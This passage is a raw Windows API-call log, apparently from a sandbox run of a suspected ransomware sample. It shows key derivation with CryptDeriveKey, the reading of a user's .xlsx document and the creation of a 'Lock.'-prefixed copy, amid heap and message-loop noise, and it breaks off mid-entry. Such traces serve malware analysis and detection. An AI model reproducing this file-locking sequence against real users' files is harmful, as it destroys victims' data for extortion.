4 [0220.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.440] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0220.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.440] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.440] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0220.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabaa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0220.440] CryptHashData (hHash=0x9e1d38, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0220.440] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.440] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.445] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.445] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0220.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabc68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0220.445] CryptDeriveKey (in: hProv=0xa7c440, Algid=0x6601, hBaseData=0x9e1d38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0220.446] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.446] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.446] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0220.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7000, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0220.446] CryptDestroyHash (hHash=0x9e1d38) returned 1 [0220.446] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/tMLcqE8DzcE8ZL.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\tmlcqe8dzce8zl.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0220.447] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.447] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0220.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0220.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.448] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0220.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b78 [0220.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.449] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0220.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854b78 | out: hHeap=0x2af0000) returned 1 [0220.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0220.449] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0220.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0220.450] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.tMLcqE8DzcE8ZL.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.tmlcqe8dzce8zl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0220.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0220.810] TranslateMessage (lpMsg=0x8cf708) returned 0 [0220.810] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0220.810] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0220.810] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0220.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0220.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0220.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0220.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0220.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0220.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0220.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e4020 [0220.814] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0220.814] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x4e15, lpOverlapped=0x0) returned 1 [0220.816] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0220.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e15) returned 0x2a8a138 [0220.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e4020 | out: hHeap=0x2af0000) returned 1 [0220.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0220.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0220.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e15) returned 0x2a8ef58 [0220.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0220.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e15) returned 0x2a8a138 [0220.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0220.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0220.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0220.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0220.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0220.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0220.821] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0220.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0220.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e15) returned 0x2a8a138 [0220.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0220.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0220.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e15) returned 0x2a93d78 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0220.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0220.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0220.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: 